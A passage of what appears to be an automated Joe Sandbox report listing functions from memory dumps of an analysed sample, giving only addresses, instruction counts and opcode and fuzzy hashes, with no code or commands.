                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 97fd133d6f95923d908deba08c492450252faabf2ec1148b244b5aefda93b66e
                                                • Instruction ID: dedb7769f437952d8cbabe602aa4885dc903845d26322f73c79c1df940db4dda
                                                • Opcode Fuzzy Hash: 97fd133d6f95923d908deba08c492450252faabf2ec1148b244b5aefda93b66e
                                                • Instruction Fuzzy Hash: 1321CE4AA8F793C6F22953791C220BC5A80DF57321F58C6BAC74E870D2DD0CA84D52E2
                                                Function 00007FFAACF1B6D4 Relevance: .3, Instructions: 291COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 98c1dc81c41073742f812c0b918034116984ad8803ce23f010ce85647b237110
                                                • Instruction ID: 3d1297db1b121db8cba0d9f090e81e9939927ee35b6eb1ea11883f433907e8dc
                                                • Opcode Fuzzy Hash: 98c1dc81c41073742f812c0b918034116984ad8803ce23f010ce85647b237110
                                                • Instruction Fuzzy Hash: 6511C0C2D0E393C6F269577914261BC5A805F53631F9881BAD74E870C2DC0CA94F63F2
                                                Function 00007FFAACF1423A Relevance: .3, Instructions: 285COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cd2ef675040df25de81df82f9aa1f08f0d9dc0f8966538ac935dd6d2044fb9bb
                                                • Instruction ID: a5fd9def377e8c8840a1f17988d790349434dc9b219f321785e9d28e5d2768b4
                                                • Opcode Fuzzy Hash: cd2ef675040df25de81df82f9aa1f08f0d9dc0f8966538ac935dd6d2044fb9bb
                                                • Instruction Fuzzy Hash: B3A19670519655CFEB49CF18C0D05B43BA1FF96310B6486BDD95ECB68ACA38E886CBD0
                                                Function 00007FFAACF113E3 Relevance: .3, Instructions: 280COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 183963f0d7affc36283294f2817c632062fa92359f14117d8cc59e3d209d81c4
                                                • Instruction ID: 6523558dead1fcb85450cebb81e185aa789344b3edfa0319139f824af70f5d19
                                                • Opcode Fuzzy Hash: 183963f0d7affc36283294f2817c632062fa92359f14117d8cc59e3d209d81c4
                                                • Instruction Fuzzy Hash: A511C192D1F383C6FA79437818251BC6AA09F43220F1CD2BAD64E874C2DD0DA84D63E3
                                                Function 00007FFAACF113DD Relevance: .3, Instructions: 269COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 84c508ad46a44f6723c6841d644f93db32e104b5a027b03623c39eb7a0d5f4e3
                                                • Instruction ID: c8103f1acb3335dcad6c671be3db862b55c7622fb850c0ccfb5a17a6ec299aa7
                                                • Opcode Fuzzy Hash: 84c508ad46a44f6723c6841d644f93db32e104b5a027b03623c39eb7a0d5f4e3
                                                • Instruction Fuzzy Hash: 0311DA81E0F393C2FE28077518210BC5A609F83210F1CD17AD60F830C6DD0EA88863E2
                                                Function 00007FFAACF18336 Relevance: .3, Instructions: 265COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 20351eb35d03f354526e766ac61992c0128a4956d259601139d17b2bfe047fa7
                                                • Instruction ID: 284c03529e9250dad6338e69369fcaa17d1a9e1208a8d2855d73ab886942a6bc
                                                • Opcode Fuzzy Hash: 20351eb35d03f354526e766ac61992c0128a4956d259601139d17b2bfe047fa7
                                                • Instruction Fuzzy Hash: 5981397191D742CBF3689B2895461B9B7E0EF42314F26853ED18FC3582DE29F80A87E1
                                                Function 00007FFAACF1D186 Relevance: .3, Instructions: 263COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f438159d49a9619c75a499b9aa5f6dc0b043951ad66ab4a71701c8a4ff6831c3
                                                • Instruction ID: 40b47938757d552c8b299360ea821b87a493ef085922dfab635f8ffbee5b2733
                                                • Opcode Fuzzy Hash: f438159d49a9619c75a499b9aa5f6dc0b043951ad66ab4a71701c8a4ff6831c3
                                                • Instruction Fuzzy Hash: 66815B7191FB868BF3295B3894455B977F0EF46310F24843ED58EC7182DE29F40983A1
                                                Function 00007FFAACF12F06 Relevance: .3, Instructions: 257COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0ab0046fe7b1da90009fd81d453510a1166f29c2a6e554ded5fb24f7b93db8ac
                                                • Instruction ID: 041bd9415a4f600d8da497713d04b9308ac8dfe881343246ce159cd99b72536d
                                                • Opcode Fuzzy Hash: 0ab0046fe7b1da90009fd81d453510a1166f29c2a6e554ded5fb24f7b93db8ac
                                                • Instruction Fuzzy Hash: 7C812571A0EB068FF3285B7C94465B977E1EF52310F15847ED98F83192DE29F80A87A1
                                                Function 00007FFAACF1B357 Relevance: .3, Instructions: 257COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fb59a0ed2c6f569c15d3ced33128c7c828c092efb57ae4a49c8da10e77f87150
                                                • Instruction ID: 7579445c521c369094e2cee8a36ba272ad5a2c5b6aa38861cd931e374d01d4df
                                                • Opcode Fuzzy Hash: fb59a0ed2c6f569c15d3ced33128c7c828c092efb57ae4a49c8da10e77f87150
                                                • Instruction Fuzzy Hash: 3F7114B190E649CBF768DF2984565BC37C0FF46320B1482B9D29EC35A2DE18E81E87D1
                                                Function 00007FFAACF16499 Relevance: .3, Instructions: 254COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 28b23b326308ba247d5b7a9a29d5d3ec322928c9b685d2cc423a3dac796522ec
                                                • Instruction ID: 3a011867b74cace1cd2b7ab8072a686a77c3566b500c020caab6eec337073d5e
                                                • Opcode Fuzzy Hash: 28b23b326308ba247d5b7a9a29d5d3ec322928c9b685d2cc423a3dac796522ec
                                                • Instruction Fuzzy Hash: 1671143990E649CBF768DF288C165BC37D0EF4A310B1442B9D39EC75A6DE18E81E86D1
                                                Function 00007FFAACF11C2B Relevance: .2, Instructions: 242COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ddc79b23afc9ecb9bc922cbae607766bd922c8cd67394bbb736224da3e2a1039
                                                • Instruction ID: 6e355fccf7ea0138ab63df61362bc68a5aed218143907c8d489a1485c980f218
                                                • Opcode Fuzzy Hash: ddc79b23afc9ecb9bc922cbae607766bd922c8cd67394bbb736224da3e2a1039
                                                • Instruction Fuzzy Hash: 2771BF70D2D64ACEFB99DB74C8516FCBBA1FF56300F108579D10ED7192EA28A849C7A0
                                                Function 00007FFAACF1705B Relevance: .2, Instructions: 238COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 46888d498aab58da6764445e1c22eba734aedae0239a241a9dca30917008dbbd
                                                • Instruction ID: f302796bfa6a93cc0892eeff67b7ad5da4e0f16cf7f614c94462dc4721660fc7
                                                • Opcode Fuzzy Hash: 46888d498aab58da6764445e1c22eba734aedae0239a241a9dca30917008dbbd
                                                • Instruction Fuzzy Hash: C171B07191D74ACFFB54DB74C854ABDBBA1EF4A300F10457AE10ED3181DF28A84A87A0
                                                Function 00007FFAACF1107D Relevance: .2, Instructions: 234COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 12a8c420079e7a4cc120e30918d9ddcc18ffd0aea41f000bd522dbae01466e3b
                                                • Instruction ID: 85e1c339cf81fad48fd1aa0ac71839250de73f52f8f3b29dc394d608fed6aec7
                                                • Opcode Fuzzy Hash: 12a8c420079e7a4cc120e30918d9ddcc18ffd0aea41f000bd522dbae01466e3b
                                                • Instruction Fuzzy Hash: F261473150E649CFFB68DB3894165BCB7D4FF46320B0682B9D15EC75A2DA18E80E87D1
                                                Function 00007FFAACF13B2E Relevance: .2, Instructions: 208COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 373a923507e43e20a0809ae3129dbcee81762931eaa1bf43bd07f29177d1f649
                                                • Instruction ID: 3a417a704771d9142884df8fc05cea622e4159e2dc64873e783e28bc2057fcda
                                                • Opcode Fuzzy Hash: 373a923507e43e20a0809ae3129dbcee81762931eaa1bf43bd07f29177d1f649
                                                • Instruction Fuzzy Hash: 1271E37050DB46CFE749DB28D4916A8BBA0FF16300F5481B9D84EC7A86DB28F859C7D0
                                                Function 00007FFAACF198E0 Relevance: .2, Instructions: 181COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b54f42564f3ac7b5ca27ced14a255fb3c7db72b0ff08358587218b69803515d9
                                                • Instruction ID: 411ce53f9dd15420fbe48128a847332bd5f2aaccde1cd573a34314c287e3c0df
                                                • Opcode Fuzzy Hash: b54f42564f3ac7b5ca27ced14a255fb3c7db72b0ff08358587218b69803515d9
                                                • Instruction Fuzzy Hash: 6851F560D0C65ACFFB9C972884656FCB7A1FF56300F4481BDD14EC7186DE28AA8887D1
                                                Function 00007FFAACF1413F Relevance: .2, Instructions: 176COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6176df749606d812128b8911199b4626c5fd4457e81b6183b1cf595477aafca6
                                                • Instruction ID: c3821148f55f78f47b3dfa37818588d2eb58f3704b274c234633a8b44ebf419c
                                                • Opcode Fuzzy Hash: 6176df749606d812128b8911199b4626c5fd4457e81b6183b1cf595477aafca6
                                                • Instruction Fuzzy Hash: 6051E430519682CBFB1ECF24C4A05797B61FF92311B1485BDD98F8B58BCE28E445CBA1
                                                Function 00007FFAACF1BF1B Relevance: .2, Instructions: 155COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 43f910bbeab8134e7e6fb175f7266b563a03826681feefe78f80ba8ec9b6db10
                                                • Instruction ID: 691b49b609a3b98474ba15b02fbf50a23423d9a14d1bdf62a9e80e9dfb1fc0d8
                                                • Opcode Fuzzy Hash: 43f910bbeab8134e7e6fb175f7266b563a03826681feefe78f80ba8ec9b6db10
                                                • Instruction Fuzzy Hash: A551BDB0D1964ACFEB95DBB4C8559FCBBB1FF56300F1085BAD10EC7192DA24A849CB90
                                                Function 00007FFAACB208D0 Relevance: .1, Instructions: 139COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1639655376.00007FFAACB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacb20000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2306358cae29adc1059d3e9855aebbecbbf9dc751322b47539ed9c50c4dd5b14
                                                • Instruction ID: c46ecc477790b83d179f8a3de5167e901844c0867cf8abc2796442ddcf7ef3d6
                                                • Opcode Fuzzy Hash: 2306358cae29adc1059d3e9855aebbecbbf9dc751322b47539ed9c50c4dd5b14
                                                • Instruction Fuzzy Hash: 0C412BA6A0E5664AF705B3BDE0996FDBB40DF46325F0844BBD44DC61A3EE08A845C2C8
                                                Function 00007FFAACF144B0 Relevance: .1, Instructions: 128COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9d149f805744313a3628665badf1fb36fed5535681ad770bdb9950c827cccbfd
                                                • Instruction ID: 7a66aff66317b11bdb1996cc4a9d1a75ee22e9f277a2ed0e251758ce75bfa16e
                                                • Opcode Fuzzy Hash: 9d149f805744313a3628665badf1fb36fed5535681ad770bdb9950c827cccbfd
                                                • Instruction Fuzzy Hash: 2D41266091C65ACEFB69DB2884616B87BA1FFD6300F1481B9D14EC71C6CD38E9888B91
                                                Function 00007FFAACB20910 Relevance: .1, Instructions: 128COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1639655376.00007FFAACB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacb20000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 309b0cb05432a74129826ce0c1025bcc9ff7016766a512227778470b64d0e6f1
                                                • Instruction ID: 33674855b26090de4f388f5aaef4cabf3358985c217e0d9711fc6cbd41f07d39
                                                • Opcode Fuzzy Hash: 309b0cb05432a74129826ce0c1025bcc9ff7016766a512227778470b64d0e6f1
                                                • Instruction Fuzzy Hash: 35310DA190D5654AF715B3BDA0996F9A781DF46324F1844BBD44DC61E3EE08A845C2C8
                                                Function 00007FFAACF15787 Relevance: .1, Instructions: 127COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5da7ab5215a67b4c6da2f6041cf53dc3a4bbca164645a561680aca50c2f6520c
                                                • Instruction ID: d56a7444686941f35e10b6068c7c49ac11e70be88bcb0a1cf0f975d8a8904ab8
                                                • Opcode Fuzzy Hash: 5da7ab5215a67b4c6da2f6041cf53dc3a4bbca164645a561680aca50c2f6520c
                                                • Instruction Fuzzy Hash: CF416271A0CA09CFDF8CEB28C455DA9B7E1FF69320B144569E10EC3592DF21E855CB91
                                                Function 00007FFAACF1ABB7 Relevance: .1, Instructions: 127COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 905001d37e551a7e9f6a82ee8bf7386d0a9e6320848f5262f3c6798fea57e059
                                                • Instruction ID: bab101379bbabdb56b4835cffb714c994cd9ab2dfadfbeaaa8b257cd57b823c1
                                                • Opcode Fuzzy Hash: 905001d37e551a7e9f6a82ee8bf7386d0a9e6320848f5262f3c6798fea57e059
                                                • Instruction Fuzzy Hash: A5416F7160CA088FDF89EB28C496DA8B7E1FB69311B14426AE10FC7192DF31E955CB91
                                                Function 00007FFAACF15831 Relevance: .1, Instructions: 120COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9149b0b0042a92b53648ae8881a86515763a5a2674699a77c7d2da0f563f0dce
                                                • Instruction ID: 3a262024f19f8fc2f9e704246a2ad425b9cce5e9c981eedb67aeb17b67ce8ed2
                                                • Opcode Fuzzy Hash: 9149b0b0042a92b53648ae8881a86515763a5a2674699a77c7d2da0f563f0dce
                                                • Instruction Fuzzy Hash: 26319171A0CA49CFDF8CEB28C055EA4B7E1FF69310B1405ADE40EC7192DE21E845CB92
                                                Function 00007FFAACF1AC61 Relevance: .1, Instructions: 120COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8d288747ca87a380a10600654a946e73a4d52929c78d6e3b4a1d64d55218512c
                                                • Instruction ID: dbac39d2dc28acb51e6ac5e3cfa0ee2485be20cea07942ae703f57daf818ae4d
                                                • Opcode Fuzzy Hash: 8d288747ca87a380a10600654a946e73a4d52929c78d6e3b4a1d64d55218512c
                                                • Instruction Fuzzy Hash: B0316F71608A488FDF8DEB28C095E74B7E1FF69311B1446AAE44EC7192DF30E895CB91
                                                Function 00007FFAACF157CB Relevance: .1, Instructions: 115COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7cfe31e38062a7a6987d71e9f84ca40ab2f365093dfd349d3379a87b0d65e606
                                                • Instruction ID: bd192e1615b1fb94016ad93208be17f53e962f190aa821a5043d945799f20d91
                                                • Opcode Fuzzy Hash: 7cfe31e38062a7a6987d71e9f84ca40ab2f365093dfd349d3379a87b0d65e606
                                                • Instruction Fuzzy Hash: FB318F7160CA09CFDF9CEB28C055EA4B7E1FF69310B1405A9E00EC7692DE25E885CB91
                                                Function 00007FFAACF1ABFB Relevance: .1, Instructions: 115COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 713c318c243060f4916ea7c97580bc147618d468b7039aed84e82cccd2f53244
                                                • Instruction ID: 6c98c1a44c2f0b82e3a78a68d47957d92e036f5ed1f928a53a162fe047bf0d53
                                                • Opcode Fuzzy Hash: 713c318c243060f4916ea7c97580bc147618d468b7039aed84e82cccd2f53244
                                                • Instruction Fuzzy Hash: 65317071608A09CFDF89EB28C095EB4B7E1FB69310B14466AE00FC7192DF34E895CB81
                                                Function 00007FFAACB20998 Relevance: .1, Instructions: 98COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1639655376.00007FFAACB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacb20000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 33592c7a7479b722f7b1e9978d6fe47f6cf614341ae1462db0232f63ecd05414
                                                • Instruction ID: 472e3f2f87c0ed3eae9a88144dfd3cfb792a924f8f912aa47c63f5290e8c2ded
                                                • Opcode Fuzzy Hash: 33592c7a7479b722f7b1e9978d6fe47f6cf614341ae1462db0232f63ecd05414
                                                • Instruction Fuzzy Hash: FE213A60B1D9594FFB58A73CD45A67AB6C2EF99311F0440B9E40EC32E3ED19EC458284
                                                Function 00007FFAACF15595 Relevance: .1, Instructions: 97COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5e6c2ae656c82d64bebdd32cd8ce9076d2f0f04e745b922a0c5339f338836057
                                                • Instruction ID: 464122c5d025f04d8f283a88c01d205559cf25951f6ea3426efc3aa31e8f437d
                                                • Opcode Fuzzy Hash: 5e6c2ae656c82d64bebdd32cd8ce9076d2f0f04e745b922a0c5339f338836057
                                                • Instruction Fuzzy Hash: 0531353091AA4ACFEF98DB6484915BDB7B1FF56300F50807AE10ED3181DA39A9489BE1
                                                Function 00007FFAACF1A9C5 Relevance: .1, Instructions: 95COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ba0d1712613b954dde67f383ef1299497ed6e87a7a748d3c4d2fa30ff7858254
                                                • Instruction ID: 587eb85e26ae2642dd2f7a7c62787103b7ab191ef0f0a1be5a2379e2a0a474ab
                                                • Opcode Fuzzy Hash: ba0d1712613b954dde67f383ef1299497ed6e87a7a748d3c4d2fa30ff7858254
                                                • Instruction Fuzzy Hash: B6316D3091AA4ACFFB9CCB6485515BD77F0FF46300F5080BBD10EE3191DA39A9488B91
                                                Function 00007FFAACB20960 Relevance: .1, Instructions: 93COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1639655376.00007FFAACB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacb20000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ba44d7364815d69c285f3b05533ad2b963dd6be7d486d4f18cd4efefddf6e4a3
                                                • Instruction ID: 574b383e23304b6960184054d1e5131a736ccddff4336008113ff1c140dc244a
                                                • Opcode Fuzzy Hash: ba44d7364815d69c285f3b05533ad2b963dd6be7d486d4f18cd4efefddf6e4a3
                                                • Instruction Fuzzy Hash: 3B214DA1A1D9664BF758737CA48EAF9A6C5DF46321F0444BAE40DC31E3ED0DAC4542C8
                                                Function 00007FFAACF198B0 Relevance: .1, Instructions: 92COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
